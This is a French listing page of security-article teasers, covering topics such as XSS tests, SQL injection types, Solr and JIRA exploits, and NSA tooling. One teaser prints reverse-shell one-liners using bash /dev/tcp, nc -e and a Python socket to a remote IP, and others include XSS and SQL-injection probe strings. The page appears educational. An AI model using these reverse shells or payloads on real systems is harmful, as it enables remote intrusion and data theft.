localisation actuelle:Maison > Articles techniques > Opération et maintenance > Sécurité

  • Qu'est-ce que la technologie de sécurité portuaire H3C ?
    Qu'est-ce que la technologie de sécurité portuaire H3C ?
    À l’heure où Internet se développe de plus en plus, la sécurité est un sujet auquel il faut prêter attention. De nombreux comportements menacent les ports de commutation dans les entreprises, tels que les hôtes d'utilisateurs non autorisés se connectant de manière aléatoire au réseau de l'entreprise. Par exemple, si les employés possèdent leur propre ordinateur portable, ils peuvent débrancher le câble réseau d'un hôte donné sans le consentement de l'administrateur, le brancher sur l'ordinateur portable qu'ils ont apporté, puis le connecter au réseau de l'entreprise. Cela entraînera de grands risques pour la sécurité. cela est très susceptible d’entraîner la perte d’informations confidentielles. Un autre exemple est l’installation de hubs et autres équipements réseau sans consentement. Afin d'augmenter le nombre de terminaux du réseau, certains salariés le feront sans autorisation. Branchez des appareils tels que des hubs et des commutateurs sur l'interface réseau du bureau. Dans ce cas, le trafic de l'interface du commutateur correspondant à cette interface réseau va augmenter.
    Sécurité 1120 2023-05-19 12:46:46
  • Analyse des instances IPSec basée sur GRE
    Analyse des instances IPSec basée sur GRE
    IPSecoverGRE
    Sécurité 1007 2023-05-19 12:40:06
  • Comment se déroule le petit test de xss ?
    Comment se déroule le petit test de xss ?
    Il n'y a aucune restriction de sécurité, utilisez simplement alert(/xss/); Restrictions : Seuls les CSS peuvent être utilisés, les balises html ne sont pas autorisées. Nous savons que cette expression peut être utilisée pour construire du XSS, mais elle ne peut être testée que sous IE, donc. le test suivant Veuillez exécuter dans IE6. body{black;xss:alert(/xss/));/*Testé sous IE6*/}Restrictions : le HTML est échappé et la balise Image est disponible. Les caractères saisis par le test seront insérés dans l'adresse src, vous pourrez donc utiliser un pseudo protocole pour la contourner. Entrez directement alert(/xss/); ou vous pouvez utiliser des événements pour le contourner. Faites simplement attention à l'instruction de clôture, comme suit : 1&quo.
    Sécurité 1010 2023-05-19 11:37:06
  • Exemple d'analyse de la récurrence de la vulnérabilité bash
    Exemple d'analyse de la récurrence de la vulnérabilité bash
    BourneAgainShell (BASH en abrégé) est l'implémentation SHELL la plus populaire sur GNU/Linux. Elle est née en 1980. Après des décennies d'évolution, elle est passée d'un simple interpréteur de ligne de commande de terminal à une interface multifonctionnelle profondément intégrée au système GNU. . Bash, un type de shell Unix. La première version officielle a été publiée en 1989. Elle était initialement prévue pour être utilisée sur le système d'exploitation GNU, mais elle peut fonctionner sur la plupart des systèmes d'exploitation de type Unix, notamment Linux et MacOSXv10.4, qui l'utilisent comme shell par défaut. Il a également été porté sur Cygwin et MinGW sur Microsoft Windows, ou peut être utilisé sur MS-
    Sécurité 1311 2023-05-19 11:13:11
  • Comment Zabbix surveille les données Traceroute
    Comment Zabbix surveille les données Traceroute
    1. Zabbixserver et proxy installent le script mtrmtr et placez-le dans le chemin suivant de zabbixserver et proxy : exécutez chownzabbix:zabbixmtrtrace.shzabbix pour créer le modèle mtrtrace : 5. Associez l'hôte au modèle et observez les données dans zabbix : [surveillance ]-[dernières données] :
    Sécurité 956 2023-05-19 11:10:12
  • Exemple d'analyse de la vulnérabilité RCE d'injection de modèle de vitesse Apache Solr
    Exemple d'analyse de la vulnérabilité RCE d'injection de modèle de vitesse Apache Solr
    0x01 Introduction Solr est un serveur d'applications de recherche indépendant au niveau de l'entreprise qui fournit une interface API similaire à un service Web. Les utilisateurs peuvent soumettre des fichiers XML dans un certain format au serveur du moteur de recherche via des requêtes http pour générer des index ; ils peuvent également effectuer des requêtes de recherche via des opérations HttpGet et obtenir les résultats renvoyés au format XML. 0x02 Introduction à la vulnérabilité Le composant VelocityResponseWriter existe dans Solr. Un attaquant peut construire une requête spécifique pour modifier la configuration appropriée, de sorte que le composant VelocityResponseWriter permette le chargement du modèle spécifié, ce qui à son tour amène le modèle Velocity à injecter une vulnérabilité d'exécution de commande à distance. L'attaquant exploite cela
    Sécurité 1021 2023-05-19 10:37:13
  • Analyse d'un exemple d'utilisation de la vulnérabilité JIRA pour accéder au réseau de routeurs de protocole Internet non classifié de l'armée américaine
    Analyse d'un exemple d'utilisation de la vulnérabilité JIRA pour accéder au réseau de routeurs de protocole Internet non classifié de l'armée américaine
    Ce qui suit décrit comment l'auteur a participé au projet de test public de la vulnérabilité Hack the Pentagon du Département américain de la Défense (DoD) et a utilisé la vulnérabilité JIRA CVE-2017-9506 pour construire une surface d'attaque SSRF et accéder à l'Internet non confidentiel de l'armée américaine. Protocol Router Network (NIPRnet), et en combinaison avec d'autres techniques de vulnérabilité, une série d'informations sensibles du système intranet du DoD a été obtenue. En raison de la nature confidentielle du processus et du contenu du test, cet article n'aborde que ce point sans divulguer trop de détails techniques et de scénarios détaillés. Il est uniquement destiné à l'apprentissage et au partage, et j'espère que les lecteurs me supporteront. JIRA est un excellent outil logiciel de suivi et de gestion des problèmes développé par la société Atlassian en Australie. Il peut suivre et gérer différents types de problèmes.
    Sécurité 1084 2023-05-18 22:29:09
  • Quels sont les types d'injection SQL ?
    Quels sont les types d'injection SQL ?
    Préface Les méthodes d'attaque par injection SQL peuvent être divisées en injection explicite, injection d'erreur et injection aveugle en fonction de l'application traitant le contenu renvoyé par la base de données. Les attaquants par injection explicite peuvent obtenir directement le contenu souhaité à partir du contenu actuel de l'interface. Le résultat renvoyé par la requête de base de données d'injection d'erreurs n'est pas affiché sur la page, mais l'application imprime les informations d'erreur de base de données sur la page, afin que l'attaquant puisse construire une instruction d'erreur de base de données et obtenir le contenu souhaité à partir des informations d'erreur. Les résultats des requêtes de base de données par injection aveugle ne peuvent pas être obtenus à partir de la page intuitive. L'attaquant obtient le contenu souhaité en utilisant la logique de la base de données ou en retardant l'exécution de la bibliothèque de base de données. Injection manuelle Mysql injection combinée?id=1'orderby4--
    Sécurité 2110 2023-05-18 22:05:12
  • Que sont les obus à rebond ?
    Que sont les obus à rebond ?
    1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
    Sécurité 2119 2023-05-18 22:01:04
  • Comment utiliser le nouveau framework APT de la NSA, DarkPulsar
    Comment utiliser le nouveau framework APT de la NSA, DarkPulsar
    Préface En mars 2017, ShadowBrokers a publié un document confidentiel qui a choqué le monde, comprenant deux frameworks : DanderSpritz et FuzzBunch. DanderSpritz est entièrement composé de plugins et est utilisé pour recueillir des renseignements, exploiter les vulnérabilités et manipuler les appareils pris en charge. Il est écrit en Java et fournit une interface graphique similaire au panneau de gestion du botnet et un panneau de contrôle similaire à l'outil Metasploit. Il intègre également des portes dérobées et des plugins pour les appareils non contrôlés par FuzzBunch. Présentation de l'interface DanderSprit Fuzzbunch fournit un cadre permettant à différents utilitaires d'interagir et de travailler ensemble, y compris divers types de plug-ins.
    Sécurité 1314 2023-05-18 20:14:58
  • Comment analyser la vulnérabilité de contournement du bac à sable Ghostscript SAFER
    Comment analyser la vulnérabilité de contournement du bac à sable Ghostscript SAFER
    Préface Ghostscript est un logiciel interpréteur du langage Adobe PostScript. Il peut dessiner en langage PostScript et prend en charge la conversion entre PS et PDF. Actuellement, il est installé par défaut dans la plupart des distributions Linux et a été porté sur Unix, MacOS, Windows et d'autres plates-formes. Ghostscript est également utilisé par des programmes tels que ImagineMagic, PythonPIL et divers lecteurs PDF. Description de la vulnérabilité Le 21 août, le chercheur en sécurité de Google, Tavis Ormandy, a révélé plusieurs vulnérabilités GhostScript. En créant des scripts PostScript malveillants dans des images, vous pouvez les contourner.
    Sécurité 1468 2023-05-18 19:10:39
  • DDCTF2019两个逆向分别是什么
    DDCTF2019两个逆向分别是什么
    01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
    Sécurité 1462 2023-05-18 17:13:20
  • Analyse d'exemples de contournement des restrictions et d'accès aux systèmes de gestion interne de Google
    Analyse d'exemples de contournement des restrictions et d'accès aux systèmes de gestion interne de Google
    Un jour, en recherchant les vulnérabilités de Google, j'ai découvert certaines adresses IP des propres services de Google à partir de vulnérabilités publiques. Au début, je ne savais vraiment pas ce que ces adresses IP pouvaient faire. J'ai d'abord vérifié ces adresses IP et j'ai découvert qu'elles contenaient certaines des adresses IP internes de Google. Je me suis soudainement rappelé que récemment, mon ami KLSREERAM avait signalé une vulnérabilité liée à l'adresse IP interne de Google, et un autre ami Vishnu avait signalé une vulnérabilité qui utilisait les sous-domaines de Google pour accéder au panneau de configuration. Actuellement, les deux vulnérabilités ont été corrigées par Google et les adresses IP internes liées à ces deux vulnérabilités ne sont pas accessibles depuis Internet. Mais maintenant, avec plusieurs adresses IP internes de Google devant moi, je dois trouver un moyen de voir si je peux
    Sécurité 1109 2023-05-18 15:19:49
  • Comment implémenter l'analyse de vulnérabilité de l'application Disk Pulse Enterprise Window
    Comment implémenter l'analyse de vulnérabilité de l'application Disk Pulse Enterprise Window
    1. Introduction à la vulnérabilité DiskPulseEnterprise est un logiciel qui surveille les modifications du disque. Il peut se connecter et gérer le logiciel via un port de gestion 9120 ou une fenêtre de gestion Web 80 pour surveiller les modifications du disque. Il existe une bibliothèque de liens dynamiques libspp.dll dans DiskPulse Enterprise, qui contient certaines fonctions responsables des opérations HTTP. Le problème se produit dans cette bibliothèque de liens dynamiques lors du traitement des données de publication, car il n'y a pas de contrôle strict de la longueur des données de publication. Lors de l'exécution des données acquises, les données sont copiées dans une mémoire invalide, provoquant un débordement de tampon, déclenchant le traitement de comportement anormal SEH et finalement contrôlant EIP pour exécuter du code arbitraire. Lien de téléchargement du logiciel : h
    Sécurité 1106 2023-05-18 15:04:07
  • Quelle est la principale raison du crash de l'APP ?
    Quelle est la principale raison du crash de l'APP ?
    1. Quels types de scénarios sont susceptibles de provoquer des problèmes de crash ? Récemment, j'ai réfléchi aux types de problèmes susceptibles de provoquer des crashs, c'est-à-dire avoir une pensée anormale. Par exemple : j'ai regardé une série télévisée américaine intitulée « The Rookie ». " il y a à peine deux jours. "Police", il y a une scène dans laquelle le protagoniste John Nolan n'a pas réussi à arrêter la voiture du fugitif avec une voiture de police, provoquant la fuite du fugitif. Quel est le lien entre cette scène et le test ? Tout d'abord, les gens normaux éviteront les collisions avec les autres lorsqu'ils conduisent sur la route. C'est comme le processus principal de test d'une fonction, et ils ne feront pas de saisies aléatoires, mais le policier fera tout ce qu'il faut pour l'attraper. le fugitif. Toutes les méthodes, c'est comme une réflexion anormale pendant le processus de test, réfléchir à la façon de faire fonctionner la fonction pour la rendre difficile à utiliser. Guide 1. Opérations anormales Diverses opérations anormales
    Sécurité 2485 2023-05-18 13:55:06

Recommandations d'outils

Code de contact du formulaire de message d'entreprise jQuery

Le code de contact du formulaire de message d'entreprise jQuery est un formulaire de message d'entreprise simple et pratique et le code de la page d'introduction contactez-nous.

Effets de lecture de boîte à musique HTML5 MP3

L'effet spécial de lecture de boîte à musique HTML5 MP3 est un lecteur de musique MP3 basé sur HTML5 + CSS3 pour créer de jolies émoticônes de boîte à musique et cliquer sur le bouton de commutation.

Effets spéciaux du menu de navigation d'animation de particules cool HTML5

L'effet de menu de navigation d'animation de particules cool HTML5 est un effet spécial qui change de couleur lorsque le menu de navigation est survolé par la souris.

Code d'édition par glisser-déposer du formulaire visuel jQuery

Le code d'édition par glisser-déposer du formulaire visuel jQuery est un formulaire visuel basé sur jQuery et le framework bootstrap.

Modèle Web de fournisseur de fruits et légumes biologiques Bootstrap5

Un modèle Web de fournisseur de fruits et légumes biologiques-Bootstrap5
Modèle d'amorçage
2023-02-03

Modèle de page Web réactive de gestion d'arrière-plan d'informations de données multifonctionnelles Bootstrap3-Novus

Modèle de page Web réactive de gestion d'arrière-plan d'informations de données multifonctionnelles Bootstrap3-Novus
modèle de back-end
2023-02-02

Modèle de page Web de plate-forme de services de ressources immobilières Bootstrap5

Modèle de page Web de plate-forme de services de ressources immobilières Bootstrap5
Modèle d'amorçage
2023-02-02

Modèle Web d'informations de CV simples Bootstrap4

Modèle Web d'informations de CV simples Bootstrap4
Modèle d'amorçage
2023-02-02

Matériau vectoriel d'éléments d'été mignons (EPS+PNG)

Il s'agit d'un joli matériau vectoriel d'éléments d'été, comprenant le soleil, un chapeau de soleil, un cocotier, un bikini, un avion, une pastèque, une crème glacée, une boisson fraîche, une bouée, des tongs, un ananas, une conque, une coquille, une étoile de mer, un crabe. , Citrons, crème solaire, lunettes de soleil, etc., le matériel est fourni aux formats EPS et PNG, y compris des aperçus JPG.
Matériau PNG
2024-05-09

Matériel vectoriel de quatre badges de graduation rouges 2023 (AI+EPS+PNG)

Il s'agit d'un matériau vectoriel de badge de remise des diplômes rouge 2023, quatre au total, disponible aux formats AI, EPS et PNG, y compris l'aperçu JPG.
Matériau PNG
2024-02-29

Oiseau chantant et chariot rempli de fleurs design matériel vectoriel de bannière de printemps (AI + EPS)

Il s'agit d'un matériau vectoriel de bannière printanière conçu avec des oiseaux chanteurs et un chariot rempli de fleurs. Il est disponible aux formats AI et EPS, y compris l'aperçu JPG.
image de bannière
2024-02-29

Matériau vectoriel de chapeau de graduation doré (EPS+PNG)

Il s'agit d'un matériau vectoriel de casquette de graduation dorée, disponible aux formats EPS et PNG, y compris l'aperçu JPG.
Matériau PNG
2024-02-27

Modèle de site Web d'entreprise de services de nettoyage et de réparation de décoration intérieure

Le modèle de site Web d'entreprise de services de nettoyage et d'entretien de décoration d'intérieur est un modèle de site Web à télécharger adapté aux sites Web promotionnels qui proposent des services de décoration, de nettoyage, d'entretien et d'autres organisations de services. Astuce : Ce modèle appelle la bibliothèque de polices Google et la page peut s'ouvrir lentement.
Modèle frontal
2024-05-09

Modèle de page de guide de CV personnel aux couleurs fraîches

Le modèle de page de guide de CV de candidature personnelle de correspondance de couleurs fraîches est un téléchargement de modèle Web de page de guide d'affichage de travail de CV de recherche d'emploi personnel adapté au style de correspondance de couleurs fraîches. Astuce : Ce modèle appelle la bibliothèque de polices Google et la page peut s'ouvrir lentement.
Modèle frontal
2024-02-29

Modèle Web de CV de travail créatif de concepteur

Le modèle Web de CV de travail créatif de concepteur est un modèle Web téléchargeable pour l'affichage de CV personnels adapté à divers postes de concepteur. Astuce : Ce modèle appelle la bibliothèque de polices Google et la page peut s'ouvrir lentement.
Modèle frontal
2024-02-28

Modèle de site Web d'entreprise de construction d'ingénierie moderne

Le modèle de site Web d'entreprise d'ingénierie et de construction moderne est un modèle de site Web téléchargeable adapté à la promotion du secteur des services d'ingénierie et de construction. Astuce : Ce modèle appelle la bibliothèque de polices Google et la page peut s'ouvrir lentement.
Modèle frontal
2024-02-28